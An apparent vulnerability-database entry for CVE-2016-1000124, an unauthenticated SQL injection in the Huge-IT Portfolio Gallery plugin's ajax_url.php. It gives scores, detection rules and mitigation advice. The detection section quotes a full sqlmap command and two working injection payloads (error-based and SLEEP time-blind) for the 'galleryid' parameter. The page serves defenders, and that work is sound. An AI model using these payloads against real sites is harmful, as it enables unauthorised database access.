cbcvebase.
CVE-2016-1000124
published 2016-10-06

CVE-2016-1000124: Unauthenticated SQL Injection in Huge-IT Portfolio Gallery Plugin v1.0.6

PriorityP262critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
2.55%
83.1th percentile
Unauthenticated SQL Injection in Huge-IT Portfolio Gallery Plugin v1.0.6

Affected

1 ranges
VendorProductVersion rangeFixed in
huge-itportfolio_gallery

Detection & IOCsextracted from sources · hover to see the quote

path/components/com_portfoliogallery/ajax_url.php
commandsqlmap -u 'http://example.com/components/com_portfoliogallery/ajax_url.php' --data="page=1&galleryid=*&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2" --level=5 --risk=3
commandpage=1&galleryid=-2264 OR 1 GROUP BY CONCAT(0x71716a7a71,(SELECT (CASE WHEN (3883=3883) THEN 1 ELSE 0 END)),0x7178627071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2
commandpage=1&galleryid=(CASE WHEN (9445=9445) THEN SLEEP(5) ELSE 9445 END)&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2
filenameajax_url.php
  • Monitor POST requests to /components/com_portfoliogallery/ajax_url.php for SQL injection patterns in the 'galleryid' parameter, including OR/GROUP BY/CONCAT/FLOOR(RAND()) error-based payloads and SLEEP()-based time-blind payloads.
  • The vulnerable POST parameter is 'galleryid'; alert on values containing SQL keywords such as OR, GROUP BY, CONCAT, SLEEP, CASE WHEN in POST body to this endpoint.
  • A high rate of HTTP 500 Internal Server Error responses from /components/com_portfoliogallery/ajax_url.php may indicate active SQL injection exploitation (sqlmap generated 2715 such errors during the PoC run).
  • The exploit requires no authentication; any unauthenticated POST to ajax_url.php with the 'post' field set to 'huge_it_portfolio_gallery_ajax' should be treated as suspicious and inspected for injection payloads.
  • ·The file ajax_url.php is directly web-accessible outside the normal Joomla MVC dispatch path, bypassing standard Joomla access controls; restricting direct HTTP access to this file at the web-server level is an effective mitigation.

CVSS provenance

nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.